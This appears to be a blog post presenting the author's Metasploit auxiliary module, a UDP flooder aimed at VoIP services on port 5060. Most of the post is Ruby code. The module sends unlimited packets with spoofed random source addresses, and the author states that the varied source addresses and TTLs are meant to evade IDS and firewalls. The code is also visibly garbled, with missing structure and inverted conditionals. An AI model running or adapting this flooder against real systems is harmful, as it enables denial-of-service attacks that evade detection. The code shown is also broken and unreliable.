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My first Metasploit module: UDP Flooder

There are very few Metasploit modules, neither Auxiliaries nor Exploits, VoIP related so I have in mind to write some of them in my free time. Today I want to share a UDP flooder Aux. module, which is very simple but perfect for learning, UDPFlooder is one of the many tools covered in "Hacking VoIP Exposed" book, considered a reference in this field.


require 'msf/core'

class Metasploit3 < Msf::Auxiliary

include Msf::Auxiliary::Dos
include Msf::Exploit::Capture

def initialize
'Name' => 'UDP Flooder',
'Description' => 'A simple UDP flooder',
'Author' => 'Jesus Perez',
'License'     => MSF_LICENSE,
'Version' => '$Revision: 0 $'

Opt::RPORT(5060),'SHOST', [false, 'The spoofable source address (else randomizes)']),'SPORT', [false, 'The source port (else randomizes)']),'NUM', [false, 'Number of UDP packets to send (else unlimited)']),'SIZE', [false, 'Size of UDP packets to send (else 256 bytes)'])
], self.class)

def sport
datastore['SPORT'] ? rand(65535)+1 : datastore['SPORT'].to_i

def rport

def srchost
datastore['SHOST'] || [rand(0x100000000)].pack('N').unpack('C*').join('.')

def size
datastore['SIZE'] ? 256 : datastore['SIZE'].to_i

def run

sent = 0
num = datastore['NUM']

print_status("UDP flooding #{rhost}:#{rport}...")

p =

p.ip_daddr = rhost
p.udp_dport = rport

while (num <= 0) or (sent < num)
p.ip_ttl = rand(128)+128
p.ip_saddr = srchost
p.udp_sport = sport
p.payload = rand(36**size).to_s(36)
sent += 1



Most of the code is taken from Metasploit TCP SYN Flooder module but I made some more changes besides adapting it to UDP. The same way TTL is changed in each packet, I prefer to change the source (spoofed) address too because of the same reason (IDS/Firewall evasion). Moreover, in this case something to send is needed so I added the new option SIZE which determines the lenght of this random string. Another different thing you could apprecciate is that option SNAPLEN is unregistered too because of having no sense in this module.

Figure: Usage information

Finally, in order to test if module works fine I´m going to sniff the interface and see, with help of Wireshark, what it´s really happening. Next picture shows that everything seems to be working as defined in the description of the attack. :)

Figures: Sniffed packets

Jesús Pérez

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